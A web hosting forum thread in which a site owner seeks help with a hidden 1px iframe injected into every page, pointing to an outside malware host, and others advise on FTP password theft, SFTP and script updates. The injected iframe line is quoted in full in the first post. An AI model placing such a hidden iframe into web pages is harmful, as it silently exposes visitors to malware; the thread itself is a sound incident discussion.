Results 1 to 12 of 12
Thread: Virus Attack - Website Blocked!
-
01-01-2011, 02:24 AM #1Disabled
- Join Date
- Sep 2010
- Posts
- 25
Virus Attack - Website Blocked!
Hello, Google tells us following code in our every page. We have tried to remove this code but this is added automatically within seconds. Google has also blocked our main website temporary for public.
Please advise,
--
Code:
--
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>Last edited by AJKservers; 01-01-2011 at 02:27 AM.
-
01-01-2011, 02:26 AM #2Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Is this a shared hosting account? if so contact your host
If it is a a dedicated server or vps, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, php shell, or even through ftp.
Can you give us more information please?Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
01-01-2011, 02:30 AM #3Disabled
- Join Date
- Sep 2010
- Posts
- 25
There are many of our websites running on the same server. It's a dedicated server running cPanel/WHM. ONLY, our main website is affected http://www.AJKservers.co.uk
I do not have any more information at the moment as we just noticed this activity and posted here for comments and advices to prevent from this kind of activities. I would need to find the source of this code, but I don't know where to startLast edited by AJKservers; 01-01-2011 at 02:36 AM.
-
01-01-2011, 03:54 AM #4Junior Guru
- Join Date
- Jun 2009
- Posts
- 207
Hello AJKservers,
I think that check your code again. because of your computer infected by virus and it infected to your html file.
please try.
-
01-01-2011, 05:32 AM #5Disabled
- Join Date
- Sep 2010
- Posts
- 25
-
01-01-2011, 08:54 AM #6Web Hosting Master
- Join Date
- Jul 2009
- Posts
- 1,568
Re-installed OS of your server OR local machine? Such injections are performed via Ftp OR a compromised script on your server. Re-installing the server OS and removing 'iframe' code won't make any difference if the compromised script is still under your account.
If the injection is performed by hacking the Ftp password, re-installing your local machine would sort out the things for you. For now. But make sure you install a firewall and limit ftp access to your own IPs so such issues can be minimized.| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux
-
01-01-2011, 11:59 AM #7Disabled
- Join Date
- Sep 2010
- Posts
- 25
Actually, the website was infected from our own local computer via FTP. There was no third party involved. However, the management of the server has also been notified at the time to take further security measures.
Anyways, I appreciate your response to this thread, madaboutlinux.
-
01-02-2011, 10:02 PM #8Junior Guru Wannabe
- Join Date
- Sep 2010
- Location
- Bangladesh
- Posts
- 85
This is happening when someone use any nulled version of scripts.
Shared Hosting by Hosting Divine
Fast, Affordable & Reliable Web Hosting
24/7 365 Support, 99.99% Network Up-time Guarantee
-
01-02-2011, 10:59 PM #9Web Hosting Master
- Join Date
- Mar 2009
- Location
- Miami, Florida
- Posts
- 20,777
-
01-03-2011, 12:13 AM #10Intangible Asset Appraiser
- Join Date
- Mar 2009
- Location
- Austin Tx
- Posts
- 2,007
The most usual attack is from sniffed FTP passwords in this form of iframe attack.
First off, either your machine is being sniffed, or someone allowed an insecure script that let in someone to run a plain text sniffer.
At the least, you will need to change the ftp passes, but after you are sure the sniffer is gone, or do it locally if you are sure it's network based.
Better, switch from the insecure ftp to at least sftp that can be encrypted, and not sniffed.
I've seen, literally, about 20 different ways the ftp password was compromised...weak passes (bruteforce attacks), sniffers, compromised configs (containing passes), "notes" left in bad places...
Most of these are hacked either with close-network password sniffs, or a bad script on someones web site that allowed an upload and execution of a local sniffer (usually an old or mis-configed Wordpress or Joomla, as KDisk said), but probably 95% chance this has to do with a compromised FTP password.This is the best signature in the world....Tribute!
(It is not the best signature in the world, no. This is just a tribute)
-
01-03-2011, 12:40 AM #11Junior Guru
- Join Date
- Jun 2009
- Posts
- 207
Hello AJKservers,
I agree with these ideas. Please check your cms component or check your code especially your javascript code. Sometime you copy some verify code of jquery or ajax it will harmful your website. one other thing, I suggest you to use protocol FTPES on your filezilla ftp client to upload your file.
-
01-03-2011, 04:52 AM #12Disabled
- Join Date
- Sep 2010
- Posts
- 25
We never used nulled scripts, softwares on our local computers were outdated, windows defender and antivirus softwares were also outdated.
Thank you guys for your comments and suggestions. We have updated all scripts, including CMS, forums etc etc , secured local computer, secured sever, changed passwords, and removed iframe from pages.
Google has also unblocked our website within 3 hours of doing all things. It's now over 35 hours and everything is going good.
Similar Threads
-
Phishing Attack: Site now blocked by D-Link Routers
By Exitof99 in forum Hosting Security and TechnologyReplies: 7Last Post: 09-30-2010, 10:22 AM -
HTML Frammer Virus Attack On Website : Please Help
By techbongo in forum Hosting Security and TechnologyReplies: 5Last Post: 06-11-2009, 02:45 PM -
possible attack or virus?
By torwill in forum Hosting Security and TechnologyReplies: 3Last Post: 07-07-2004, 01:41 AM -
Massive Virus Attack
By Artashes in forum Web HostingReplies: 18Last Post: 04-12-2003, 01:50 PM -
Virus Attack??
By VetteMan in forum Hosting Security and TechnologyReplies: 0Last Post: 04-28-2001, 03:45 AM